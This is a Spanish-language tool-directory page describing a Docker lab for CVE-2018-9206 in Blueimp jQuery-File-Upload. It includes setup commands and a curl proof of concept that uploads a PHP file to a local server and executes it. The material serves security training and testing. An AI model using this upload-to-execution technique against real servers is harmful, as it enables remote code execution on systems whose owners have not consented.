Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/flame-11/cve-2018-9206-jquery-file-upload
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubflame-11/cve-2018-9206-jquery-file-upload

CVE-2018-9206-jquery-file-upload

Entorno de laboratorio basado en Docker para CVE-2018-9206 (subida de archivos sin restricciones a RCE en Blueimp jQuery-File-Upload) con scripts de PoC y comandos de validación.

Ver Repositorio
11hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-9206 - Laboratorio Blueimp jQuery-File-Upload

Entorno Docker vulnerable para CVE-2018-9206 - Carga de archivos sin restricciones en Blueimp jQuery-File-Upload <= 9.22.0.

Inicio rápido

root@kitploit:~
docker compose up -d --build

Aplicación disponible en: http://localhost:8888/jQuery-File-Upload/

Validar

root@kitploit:~
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
  -F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'

# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED

O ejecuta el script PoC:

root@kitploit:~
./scripts/poc.sh

Limpieza

root@kitploit:~
docker compose down -v

Detalles

CampoValor
CVECVE-2018-9206
ProductoBlueimp jQuery-File-Upload
Versión9.22.0
TipoCarga de archivos sin restricciones → RCE
CVSS9.8 (Crítico)

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2018-9206
  • http://www.vapidlabs.com/advisory.php?v=204
  • https://www.exploit-db.com/exploits/45790/
Descargar herramienta